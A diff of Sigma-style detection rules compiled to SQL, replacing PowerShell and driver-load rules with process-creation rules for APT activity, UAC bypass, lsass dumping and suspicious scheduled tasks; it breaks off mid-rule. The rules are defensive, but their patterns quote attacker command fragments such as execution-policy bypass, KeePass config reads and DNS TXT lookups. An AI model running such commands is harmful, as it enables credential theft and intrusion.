"author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.collection", - "attack.t1115" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_clipboard.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", + "attack.t1036.004", "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Clear PowerShell History - PowerShell Module", - "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1070.003" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_clear_powershell_history.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_zip_compress.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Suspicious Get Local Groups Information", - "id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", - "status": "test", - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "author": "frack113", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "status": "experimental", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrator script" + "Admin activity (unclear what they do nowadays with finger.exe)" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((Payload LIKE '%get-localgroup%' ESCAPE '\\' OR Payload LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ContextInfo LIKE '%get-localgroup%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (Payload LIKE '%Get-WMIObject%' ESCAPE '\\' AND Payload LIKE '%Win32\\_Group%' ESCAPE '\\') OR (ContextInfo LIKE '%Get-WMIObject%' ESCAPE '\\' AND ContextInfo LIKE '%Win32\\_Group%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_local_group_reco.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.003" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Dism Remove Online Package", + "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (Image LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_dsim_remove.yml" }, { - "title": "Process Hacker and System Informer Driver Load", - "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "id": "435e10e4-992a-4281-96f3-38b11106adde", "status": "experimental", - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "driver_load_win_process_hacker.yml" + "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "HackTool - Impersonate Execution", + "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis", "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_hktl_impersonate.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Vulnerable Driver Load By Name", - "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects the load of known vulnerable drivers via their names only.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ADV64DRV.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ALSysIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrAutoChkUpdDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv101.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrIbDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrOmgDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrRapidStartDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrSmartConnectDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_AMD64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_IA64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GLCKIO2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HOSTNT.sys' 